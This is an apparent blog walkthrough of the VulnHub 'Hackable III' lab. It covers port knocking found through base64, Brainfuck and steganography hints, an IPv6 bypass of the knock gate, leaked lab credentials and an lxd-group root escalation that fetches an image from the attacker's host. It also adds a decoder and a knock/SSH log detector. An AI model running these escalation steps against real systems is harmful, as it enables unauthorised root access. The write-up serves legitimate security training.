VulnHub-Hackable III-Walkthrough
城南花已开 Lv6

Information Gathering

Service Detection

Only port 80 is open, which is a bit unusual.

sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.180 08:00:27:11:87:ae (Unknown)
192.168.60.254 00:50:56:e4:cc:f0 (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.939 seconds (132.03 hosts/sec). 4 responded
export ip=192.168.60.180
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Because guessing isn't hacking.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.180:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-14 13:02 CST
Initiating ARP Ping Scan at 13:02
Scanning 192.168.60.180 [1 port]
Completed ARP Ping Scan at 13:02, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:02
Completed Parallel DNS resolution of 1 host. at 13:02, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 13:02
Scanning 192.168.60.180 [1 port]
Discovered open port 80/tcp on 192.168.60.180
Completed SYN Stealth Scan at 13:02, 0.06s elapsed (1 total ports)
Nmap scan report for 192.168.60.180
Host is up, received arp-response (0.00060s latency).
Scanned at 2025-02-14 13:02:17 CST for 0s

PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:11:87:AE (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
Raw packets sent: 2 (72B) | Rcvd: 2 (72B)

Visiting port 80 in a browser shows an image with the word "open".

[image: the "open" graphic served on port 80]

Port Knocking

Fetching the page with curl reveals a message hidden in an HTML comment.

That makes the intent fairly clear:

knock the ports to activate port 22.

There is also a .jpg image and a username, jubiscleudo.

❯ curl http://192.168.60.180/
<!DOCTYPE html>
<html lang="pt-br">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<link href="https://fonts.googleapis.com/css?family=RocknRoll+One" rel="stylesheet">
<link rel="stylesheet" type="text/css" href="css/file.css">
<title>Kryptos - LAN Home</title>

</head>
<body>
<a href="#" class="menu-open"><img src="imagens/logo_menu.png" width="2" height="2"></a>
<div class="overlay"></div>
<div class="menu">
<a href="#" class="menu-close">&times;</a>
<ul>
<li><a href="login_page/login.html" target="_blank">Login</a></li>

</ul>

</div>
<!-- "Please, jubiscleudo, don't forget to activate the port knocking when exiting your section, and tell the boss not to forget to approve the .jpg file - [email protected]" -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="js/script.js"></script>
</body>
</html>

Try scanning for directories.

❯ gobuster dir -u http://$ip/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.180/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/css (Status: 301) [Size: 314] [--> http://192.168.60.180/css/]
/js (Status: 301) [Size: 313] [--> http://192.168.60.180/js/]
/config (Status: 301) [Size: 317] [--> http://192.168.60.180/config/]
/backup (Status: 301) [Size: 317] [--> http://192.168.60.180/backup/]
/imagens (Status: 301) [Size: 318] [--> http://192.168.60.180/imagens/]
/login_page (Status: 301) [Size: 321] [--> http://192.168.60.180/login_page/]
/server-status (Status: 403) [Size: 279]
Progress: 220559 / 220560 (100.00%)
===============================================================
Finished
===============================================================

The config directory contains a 1.txt.

Fetching it with curl returns base64-encoded text.

Decoding it gives 10000.

❯ curl "http://192.168.60.180/config/1.txt"|base64 -d
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 100 9 100 9 0 0 735 0 --:--:-- --:--:-- --:--:-- 750
10000%

Further enumeration turns up 2.txt,

hidden in the css folder.

This string looks like Brainfuck code.

❯ curl http://192.168.60.180/css/2.txt
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>------------------....%

An online decoder gives port 4444.

[image: online Brainfuck decoder output showing 4444]

Following the hint above, the third clue must be the image.

The login_page directory contains a login form.

[image: the login form under login_page]

But whatever you enter, it redirects to login.php.

Fetching that with curl returns the source code.

Reading it carefully reveals a 3.jpg.

❯ curl http://192.168.60.180/login.php
<?php
include('config.php');

$usuario = $_POST['user'];
$senha = $_POST['pass'];

$query = " SELECT * FROM usuarios WHERE user = '{$usuario}' and pass = '{$senha}'";

$result = mysqli_query($conexao, $query);

$row = mysqli_num_rows($result);


#validação conta
if($row == 1) {
$_SESSION['usuario'] = $usuario;
header('Location: 3.jpg');
exit();
} else {
$_SESSION['nao_autenticado'] = true;
header('Location: login_page/login.html');
exit();
}


?>

Download it with wget.

Image Steganography

The image likely contains hidden data.

Try an empty passphrase.

This yields steganopayload148505.txt

and the last port, 65535.

❯ wget http://192.168.60.180/3.jpg
--2025-02-14 13:19:45-- http://192.168.60.180/3.jpg
Connecting to 192.168.60.180:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 61259 (60K) [image/jpeg]
Saving to: ‘3.jpg’

3.jpg 100%[=======================================================================>] 59.82K --.-KB/s in 0.003s

2025-02-14 13:19:45 (17.6 MB/s) - ‘3.jpg’ saved [61259/61259]
❯ steghide extract -sf 3.jpg
Enter passphrase:
wrote extracted data to "steganopayload148505.txt".
cat steganopayload148505.txt
porta:65535 %
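The three hints above are decoded by three different tools (base64, an online Brainfuck decoder, steghide). As an added example, not code from the original walkthrough, the following script decodes all three offline. The Brainfuck text and the steghide payload are copied from the output above; the base64 string MTAwMDA= is constructed from the decoded value 10000 (the page shows only the decode, though MTAwMDA= plus a trailing newline matches the 9-byte download curl reported). The interpreter goes beyond the one hint: it handles any Brainfuck program, with bracket matching, 8-bit cell wrap-around and a step limit so an untrusted hint cannot hang the decoder.

```python
"""Decode the three port-knock hints found on this box.

Added example, not code from the original walkthrough. The Brainfuck text and
the steghide payload are copied from the output above; the base64 string is
constructed from the decoded value 10000 (the page shows only the decode).
"""
import base64
import re


def run_brainfuck(program: str, max_steps: int = 1_000_000) -> str:
    """Minimal Brainfuck interpreter: 8-bit wrapping cells, tape grows to the
    right on demand, ',' reads EOF (stores 0). Raises on unbalanced brackets
    and on runaway programs, so untrusted hint text cannot hang the decoder."""
    stack, jumps = [], {}
    for i, ch in enumerate(program):
        if ch == "[":
            stack.append(i)
        elif ch == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at offset {i}")
            j = stack.pop()
            jumps[i], jumps[j] = j, i
    if stack:
        raise ValueError(f"unmatched '[' at offset {stack[-1]}")

    tape, ptr, pc, out, steps = [0], 0, 0, [], 0
    while pc < len(program):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded; program may not terminate")
        ch = program[pc]
        if ch == ">":
            ptr += 1
            if ptr == len(tape):
                tape.append(0)
        elif ch == "<":
            if ptr == 0:
                raise IndexError("data pointer moved left of cell 0")
            ptr -= 1
        elif ch == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif ch == ".":
            out.append(chr(tape[ptr]))
        elif ch == ",":
            tape[ptr] = 0
        elif ch == "[" and tape[ptr] == 0:
            pc = jumps[pc]
        elif ch == "]" and tape[ptr] != 0:
            pc = jumps[pc]
        pc += 1
    return "".join(out)


HINT_BASE64 = "MTAwMDA="                          # config/1.txt (constructed, see above)
HINT_BRAINFUCK = ("++++++++++[>+>+++>+++++++>++++++++++<<<<-]"
                  ">>>------------------....")      # css/2.txt, copied from the page
HINT_STEG = "porta:65535"                          # steganopayload148505.txt


def port_from_base64(text: str) -> int:
    return int(base64.b64decode(text).decode("ascii").strip())


def port_from_brainfuck(program: str) -> int:
    return int(run_brainfuck(program).strip())


def port_from_steg(text: str) -> int:
    # "porta" is Portuguese for "port"; accept optional whitespace around the value.
    m = re.fullmatch(r"\s*porta:\s*(\d+)\s*", text)
    if not m:
        raise ValueError(f"unexpected payload format: {text!r}")
    return int(m.group(1))


def knock_sequence() -> list:
    """The three ports in the order the hints were numbered (1.txt, 2.txt, 3.jpg)."""
    ports = [port_from_base64(HINT_BASE64),
             port_from_brainfuck(HINT_BRAINFUCK),
             port_from_steg(HINT_STEG)]
    for p in ports:
        if not 1 <= p <= 65535:
            raise ValueError(f"decoded value {p} is not a valid TCP port")
    return ports


if __name__ == "__main__":
    print("knock sequence:", knock_sequence())   # [10000, 4444, 65535]
```

The Brainfuck program sets cell 3 to 70 in its loop (10 iterations of +7) and subtracts 18 to reach 52, the ASCII code of "4", which it prints four times; that is why the online decoder returns 4444.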

We also got wordlist.txt from the backup directory.

At first glance it looks like rockyou.

Download it with wget and compare.

Taking the first 300 lines of rockyou, only one line differs.

Presumably this is the password for the username above: onlymy.

wc -l wordlist.txt
300 wordlist.txt
head -n 300 /usr/share/wordlists/rockyou.txt>wordlist_1
❯ diff wordlist.txt wordlist_1
205d204
< onlymy
300a300
> bowwow

Try knocking the ports to open port 22.

This time 22 is open.

❯ knock $ip 10000 4444 65535
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
0day was here ♥

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.180:22
Open 192.168.60.180:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-14 13:25 CST
Initiating ARP Ping Scan at 13:25
Scanning 192.168.60.180 [1 port]
Completed ARP Ping Scan at 13:25, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:25
Completed Parallel DNS resolution of 1 host. at 13:25, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 13:25
Scanning 192.168.60.180 [2 ports]
Discovered open port 80/tcp on 192.168.60.180
Discovered open port 22/tcp on 192.168.60.180
Completed SYN Stealth Scan at 13:25, 0.04s elapsed (2 total ports)
Nmap scan report for 192.168.60.180
Host is up, received arp-response (0.00056s latency).
Scanned at 2025-02-14 13:25:43 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:11:87:AE (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Connect over ssh.

❯ ssh jubiscleudo@$ip
jubiscleudo@192.168.60.180's password:
Welcome to Ubuntu 21.04 (GNU/Linux 5.11.0-16-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Fri Feb 14 05:26:18 AM UTC 2025

System load: 0.04 Memory usage: 47% Processes: 112
Usage of /: 21.1% of 23.99GB Swap usage: 0% Users logged in: 0

=> There were exceptions while processing one or more plugins. See
/var/log/landscape/sysinfo.log for more information.


0 updates can be installed immediately.
0 of these updates are security updates.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Feb 11 15:21:56 2025 from 192.168.60.100
jubiscleudo@ubuntu20:~$ ls -al
total 32
drwxr-x--- 3 jubiscleudo jubiscleudo 4096 Apr 29 2021 .
drwxr-xr-x 4 root root 4096 Apr 29 2021 ..
-rw------- 1 jubiscleudo jubiscleudo 442 Feb 11 15:21 .bash_history
-rw-r--r-- 1 jubiscleudo jubiscleudo 220 Apr 29 2021 .bash_logout
-rw-r--r-- 1 jubiscleudo jubiscleudo 3771 Apr 29 2021 .bashrc
drwx------ 2 jubiscleudo jubiscleudo 4096 Apr 29 2021 .cache
-rw-r--r-- 1 jubiscleudo jubiscleudo 807 Apr 29 2021 .profile
-rw-r--r-- 1 jubiscleudo jubiscleudo 2984 Apr 27 2021 .user.txt
jubiscleudo@ubuntu20:~$ cat .user.txt
% ,%&&%#.
% *&&&&%%&%&&&&&&%
% &&&& .%&&&
% &&&# %&&&
% /&&& &&&.
% %&%/ %&&*
% .&&# (%%(, ,(&&* %&&
% &&% %&&&&&&&&&&&&&&%&%# &&&
% &&%&&&&&&& #&&&&&* &&&&&&&%&%
% &&&&&&&&&&&&&&, /&&&&&&&&&&&&&&
% &&&&&&&% &&&&&&&&
% %&&%&&&& /&&&%&&&%
% &.%&&% %&&% &&&& %&&/*&
% &&&&&&&&&& %&&&&# %%&&&& %&&&&&&&&&
% /&%&/ *&&&&&& %&&&&&&%& &&&&&&. %&&&.
% &&& &&%& %%%% .&&&
% &&% &&&
% %&&. *&%&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&%&& /&&(
% /&&# #&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&* %&&
% &&% ,&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&% %&%
% &&& %&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& %&&
% &&& &&&&&&&&&&&&&&&%& %&&&&&&&&&&&&&&&% &&&
% %&&&% &&&&&&&&&&&&&&&& &&&&&&&&&&&&&&&% &%&&#
% &&&&&&&%&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
% &%&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&%
% &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&%
% *&%&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
% &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&%
% #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%(

invite-me: https://www.linkedin.com/in/eliastouguinho/



Unintended Solution

Actually, the port knocking step can be skipped entirely here:

you can connect over ssh via IPv6.

But since my network environment is WSL-based,

I first need to enable IPv6:

edit .wslconfig and add ipv6=true,

restart WSL,

configure /etc/network/interfaces,

and ping the local link.

sudo vim /etc/network/interfaces
iface eth0 inet6 static
address fd15:4ba5:5a2b:1008::100
netmask 64
sudo /etc/init.d/networking restart
Restarting networking (via systemctl): networking.service.
❯ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 5e:bb:f6:9e:ee:fa brd ff:ff:ff:ff:ff:ff
inet 192.168.60.100/24 brd 192.168.60.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fd15:4ba5:5a2b:1008::100/64 scope global
valid_lft forever preferred_lft forever
inet6 fe80::5cbb:f6ff:fe9e:eefa/64 scope link
valid_lft forever preferred_lft forever
❯ ping6 -I eth0 -c 5 ff02::1
ping6: Warning: source address might be selected on device other than: eth0
PING ff02::1 (ff02::1) from :: eth0: 56 data bytes
64 bytes from fe80::5cbb:f6ff:fe9e:eefa%eth0: icmp_seq=1 ttl=64 time=0.019 ms
64 bytes from fe80::250:56ff:fec0:2222%eth0: icmp_seq=1 ttl=1 time=0.138 ms
64 bytes from fe80::a00:27ff:fe11:87ae%eth0: icmp_seq=1 ttl=64 time=0.533 ms
64 bytes from fe80::5cbb:f6ff:fe9e:eefa%eth0: icmp_seq=2 ttl=64 time=0.022 ms
64 bytes from fe80::250:56ff:fec0:2222%eth0: icmp_seq=2 ttl=1 time=0.273 ms
64 bytes from fe80::a00:27ff:fe11:87ae%eth0: icmp_seq=2 ttl=64 time=0.661 ms
64 bytes from fe80::5cbb:f6ff:fe9e:eefa%eth0: icmp_seq=3 ttl=64 time=0.022 ms
64 bytes from fe80::250:56ff:fec0:2222%eth0: icmp_seq=3 ttl=1 time=0.203 ms
64 bytes from fe80::a00:27ff:fe11:87ae%eth0: icmp_seq=3 ttl=64 time=0.661 ms
64 bytes from fe80::5cbb:f6ff:fe9e:eefa%eth0: icmp_seq=4 ttl=64 time=0.022 ms
64 bytes from fe80::250:56ff:fec0:2222%eth0: icmp_seq=4 ttl=1 time=0.492 ms
64 bytes from fe80::a00:27ff:fe11:87ae%eth0: icmp_seq=4 ttl=64 time=0.891 ms
64 bytes from fe80::5cbb:f6ff:fe9e:eefa%eth0: icmp_seq=5 ttl=64 time=0.027 ms

--- ff02::1 ping statistics ---
5 packets transmitted, 5 received, +8 duplicates, 0% packet loss, time 4149ms
rtt min/avg/max/mdev = 0.019/0.304/0.891/0.293 ms

Besides my own address fe80::5cbb:f6ff:fe9e:eefa there is another one, fe80::a00:27ff:fe11:87ae.

Scan it with nmap over IPv6:

port 22 is open.

❯ nmap -6 08:00:27:11:87:AE
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-14 14:28 CST
Failed to resolve "08:00:27:11:87:AE".
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 0.01 seconds
❯ nmap -6 fe80::a00:27ff:fe11:87ae
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-14 14:28 CST
Nmap scan report for fe80::a00:27ff:fe11:87ae
Host is up (0.00090s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:11:87:AE (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.36 seconds
❯ ssh jubiscleudo@fe80::a00:27ff:fe11:87ae%eth0
The authenticity of host 'fe80::a00:27ff:fe11:87ae%eth0 (fe80::a00:27ff:fe11:87ae%eth0)' can't be established.
ED25519 key fingerprint is SHA256:eKPnFiq8KwR3xWNP5ZL/aPJYYx+GZaCVrzrHIL4rem4.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:7: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'fe80::a00:27ff:fe11:87ae%eth0' (ED25519) to the list of known hosts.
jubiscleudo@fe80::a00:27ff:fe11:87ae%eth0's password:
Welcome to Ubuntu 21.04 (GNU/Linux 5.11.0-16-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Fri Feb 14 06:33:30 AM UTC 2025

System load: 0.0 Memory usage: 39% Processes: 111
Usage of /: 21.2% of 23.99GB Swap usage: 0% Users logged in: 0

=> There were exceptions while processing one or more plugins. See
/var/log/landscape/sysinfo.log for more information.


0 updates can be installed immediately.
0 of these updates are security updates.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Your Ubuntu release is not supported anymore.
For upgrade information, please visit:
http://www.ubuntu.com/releaseendoflife

New release '22.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.


Last login: Fri Feb 14 05:26:19 2025 from 192.168.60.100
jubiscleudo@ubuntu20:~$

So this skips the port-knocking step above.
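Two things on this box matter to a defender: the knock sequence itself is observable on the wire (the rustscan after `knock` above shows 22 opening), and the IPv6 login succeeded without any knock at all, so the gate did not cover IPv6 traffic. As an added example, not part of the original walkthrough, the following detector replays syslog lines and reports completed knock sequences and SSH logins that were never preceded by one. It assumes the knock rules log each attempt through an iptables/ip6tables LOG target with the prefix "KNOCK: " (an assumption; the box's actual firewall rules are not shown) and that sshd logs to the same syslog. Every log line below is constructed for the example.

```python
"""Detect port-knock sequences and SSH logins that never knocked.

Added example, not part of the original walkthrough. Assumes knock attempts
are logged with an iptables/ip6tables LOG prefix "KNOCK: " (assumption) and
that sshd "Accepted" lines land in the same syslog. Sample lines are constructed.
"""
import re
from collections import defaultdict

KNOCK_SEQUENCE = (10000, 4444, 65535)   # ports recovered from the three hints

# Constructed sample: a correct knock followed by an SSH login over IPv4,
# a broken knock from another host, and an SSH login over IPv6 with no knock.
SAMPLE_LOG = """\
Feb 14 13:25:01 ubuntu20 kernel: KNOCK: IN=eth0 SRC=192.168.60.100 DST=192.168.60.180 PROTO=TCP SPT=51000 DPT=10000
Feb 14 13:25:01 ubuntu20 kernel: KNOCK: IN=eth0 SRC=192.168.60.100 DST=192.168.60.180 PROTO=TCP SPT=51001 DPT=4444
Feb 14 13:25:01 ubuntu20 kernel: KNOCK: IN=eth0 SRC=192.168.60.100 DST=192.168.60.180 PROTO=TCP SPT=51002 DPT=65535
Feb 14 13:26:18 ubuntu20 sshd[1402]: Accepted password for jubiscleudo from 192.168.60.100 port 51010 ssh2
Feb 14 13:30:05 ubuntu20 kernel: KNOCK: IN=eth0 SRC=192.168.60.77 DST=192.168.60.180 PROTO=TCP SPT=40000 DPT=10000
Feb 14 13:30:05 ubuntu20 kernel: KNOCK: IN=eth0 SRC=192.168.60.77 DST=192.168.60.180 PROTO=TCP SPT=40001 DPT=65535
Feb 14 14:33:30 ubuntu20 sshd[1511]: Accepted password for jubiscleudo from fe80::5cbb:f6ff:fe9e:eefa%eth0 port 43210 ssh2
"""

KNOCK_RE = re.compile(r"kernel: KNOCK: .*?SRC=(?P<src>\S+) .*?DPT=(?P<dpt>\d+)")
SSH_RE = re.compile(r"sshd\[\d+\]: Accepted \S+ for (?P<user>\S+) from (?P<src>\S+) port \d+")


def analyse(log_text: str, sequence=KNOCK_SEQUENCE):
    """Replay the log and return a list of events:
       ("knock_complete", src)            the full sequence was hit in order
       ("ssh_after_knock", src)           login from a source that had knocked
       ("ssh_without_knock", src, family) login that bypassed the gate entirely
    A knock on the wrong port resets that source's progress, as knockd does."""
    progress = defaultdict(int)   # src -> index of the next expected port
    opened = set()
    events = []
    for line in log_text.splitlines():
        m = KNOCK_RE.search(line)
        if m:
            src, dpt = m.group("src"), int(m.group("dpt"))
            if dpt == sequence[progress[src]]:
                progress[src] += 1
                if progress[src] == len(sequence):
                    opened.add(src)
                    progress[src] = 0
                    events.append(("knock_complete", src))
            else:
                # Wrong port: start over, counting this packet if it is the first knock.
                progress[src] = 1 if dpt == sequence[0] else 0
            continue
        m = SSH_RE.search(line)
        if m:
            src = m.group("src")
            if src in opened:
                events.append(("ssh_after_knock", src))
            else:
                family = "ipv6" if ":" in src else "ipv4"
                events.append(("ssh_without_knock", src, family))
    return events


if __name__ == "__main__":
    for event in analyse(SAMPLE_LOG):
        print(*event)
```

The third event is the signal the unintended solution above produces: an SSH session accepted from an IPv6 source that never knocked. When the knock gate is built with IPv4-only firewall rules, every IPv6 login looks like this, and the fix is to apply the same gating rules to the IPv6 table (or restrict sshd to the addresses the gate actually covers) rather than to tune the detector.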


User Privilege Escalation

Back to the intended solution.

This user has no sudo rights.

Enumerate again:

there is another user, hackable_3.

jubiscleudo@ubuntu20:~$ cat /etc/passwd |grep /bin/bash
root:x:0:0:root:/root:/bin/bash
hackable_3:x:1000:1000:hackable_3:/home/hackable_3:/bin/bash
jubiscleudo:x:1001:1001:,,,:/home/jubiscleudo:/bin/bash

A backup of the configuration file sits in the web root.

It gives the user's password, TrOLLED_3; try switching to that user.

jubiscleudo@ubuntu20:~$ cd /var/www/html/
jubiscleudo@ubuntu20:/var/www/html$ ls -la
total 124
drwxr-xr-x 8 root root 4096 Jun 30 2021 .
drwxr-xr-x 3 root root 4096 Apr 29 2021 ..
-rw-r--r-- 1 www-data www-data 61259 Apr 21 2021 3.jpg
drwxr-xr-x 2 www-data www-data 4096 Apr 23 2021 backup
-r-xr-xr-x 1 www-data www-data 522 Apr 29 2021 .backup_config.php
drwxr-xr-x 2 www-data www-data 4096 Apr 29 2021 config
-rw-r--r-- 1 www-data www-data 507 Apr 23 2021 config.php
drwxr-xr-x 2 www-data www-data 4096 Apr 21 2021 css
-rw-r--r-- 1 www-data www-data 11327 Jun 30 2021 home.html
drwxr-xr-x 2 www-data www-data 4096 Apr 21 2021 imagens
-rw-r--r-- 1 www-data www-data 1095 Jun 30 2021 index.html
drwxr-xr-x 2 www-data www-data 4096 Apr 20 2021 js
drwxr-xr-x 5 www-data www-data 4096 Jun 30 2021 login_page
-rw-r--r-- 1 www-data www-data 487 Apr 23 2021 login.php
-rw-r--r-- 1 www-data www-data 33 Apr 21 2021 robots.txt
jubiscleudo@ubuntu20:/var/www/html$ cat .backup_config.php
<?php
/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'hackable_3');
define('DB_PASSWORD', 'TrOLLED_3');
define('DB_NAME', 'hackable');

/* Attempt to connect to MySQL database */
$conexao = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);


// Check connection
if($conexao === false){
die("ERROR: Could not connect. " . mysqli_connect_error());
} else {
}
?>
jubiscleudo@ubuntu20:/var/www/html$ su hackable_3
Password:
hackable_3@ubuntu20:/var/www/html$ cd ~

Actually there is a cheat: the VM's description notes give the user's password 🤣

so you can just log in directly.

[image: the VM description notes containing the password]

Root Privilege Escalation

lxd escalation

Checking the user's groups shows membership in the lxd group,

so a straightforward lxd privilege escalation works.

hackable_3@ubuntu20:/var/www/html$ id
uid=1000(hackable_3) gid=1000(hackable_3) groups=1000(hackable_3),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)

This is the same escalation as on another box I did earlier:

[[Vulnhub]Prime (2021) 2-Walkthrough | Pepster’Blog](https://pepster.me/VulnHub-Prime (2021) 2-Walkthrough/#Root提权)

hackable_3@ubuntu20:/tmp$ wget http://192.168.60.100/lxd.tar.xz
--2025-02-14 05:33:57-- http://192.168.60.100/lxd.tar.xz
Connecting to 192.168.60.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 896 [application/octet-stream]
Saving to: ‘lxd.tar.xz’

lxd.tar.xz 100%[=======================================================================>] 896 --.-KB/s in 0s

2025-02-14 05:33:57 (175 MB/s) - ‘lxd.tar.xz’ saved [896/896]

hackable_3@ubuntu20:/tmp$ wget http://192.168.60.100/rootfs.squashfs
--2025-02-14 05:34:03-- http://192.168.60.100/rootfs.squashfs
Connecting to 192.168.60.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3092480 (2.9M) [application/octet-stream]
Saving to: ‘rootfs.squashfs’

rootfs.squashfs 100%[=======================================================================>] 2.95M --.-KB/s in 0.05s

2025-02-14 05:34:03 (58.4 MB/s) - ‘rootfs.squashfs’ saved [3092480/3092480]
hackable_3@ubuntu20:/tmp$ lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
Image imported with fingerprint: 8300692522052a791a2509d9b6e81f74937de1bd3eb3289e747f3fbbc954aeaa
hackable_3@ubuntu20:/tmp$ lxc init alpine privesc -c security.privileged=true
Creating privesc
hackable_3@ubuntu20:/tmp$ lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
Device host-root added to privesc
hackable_3@ubuntu20:/tmp$ lxc start privesc
hackable_3@ubuntu20:/tmp$ lxc exec privesc /bin/sh
~ # id
uid=0(root) gid=0(root)
~ # cat /mnt/root/root/root.txt
░░█▀░░░░░░░░░░░▀▀███████░░░░
░░█▌░░░░░░░░░░░░░░░▀██████░░░
░█▌░░░░░░░░░░░░░░░░███████▌░░
░█░░░░░░░░░░░░░░░░░████████░░
▐▌░░░░░░░░░░░░░░░░░▀██████▌░░
░▌▄███▌░░░░▀████▄░░░░▀████▌░░
▐▀▀▄█▄░▌░░░▄██▄▄▄▀░░░░████▄▄░
▐░▀░░═▐░░░░░░══░░▀░░░░▐▀░▄▀▌▌
▐░░░░░▌░░░░░░░░░░░░░░░▀░▀░░▌▌
▐░░░▄▀░░░▀░▌░░░░░░░░░░░░▌█░▌▌
░▌░░▀▀▄▄▀▀▄▌▌░░░░░░░░░░▐░▀▐▐░
